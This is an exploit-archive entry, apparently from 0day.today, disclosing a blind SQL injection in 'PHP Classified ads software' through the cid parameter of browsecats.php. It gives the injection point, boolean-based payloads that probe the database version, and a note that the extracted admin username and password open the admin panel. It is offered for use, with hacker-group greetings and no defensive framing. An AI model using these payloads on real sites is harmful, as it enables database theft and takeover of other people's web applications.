id: 15336
date: 01/29/2011
title: PHP Classified ads software (cid) Blind SQL Injection Vulnerability
author: BorN To K!LL
cves: 

==
[-]Author: BorN To K!LL - h4ck3r
[-]Contact: SQL@hotmail.co.uk
==
[-]Script: PHP Classified ads software
[-]Version: n/a
[-]Link: http://www.softbizsolutions.com/classified-ads-software.php
==
[-]3xploit:
[path]/browsecats.php?cid=[Blind-Injection]
 
[-]3xample:
[path]/browsecats.php?cid=2 and substring(version(),1,1)=4         // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5         // true ,,
 
[-]Note:
after getting the username and the password you can login to admin panel
[path]/admin
==
[-]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
 


#  0day.today [2023-03-24]  #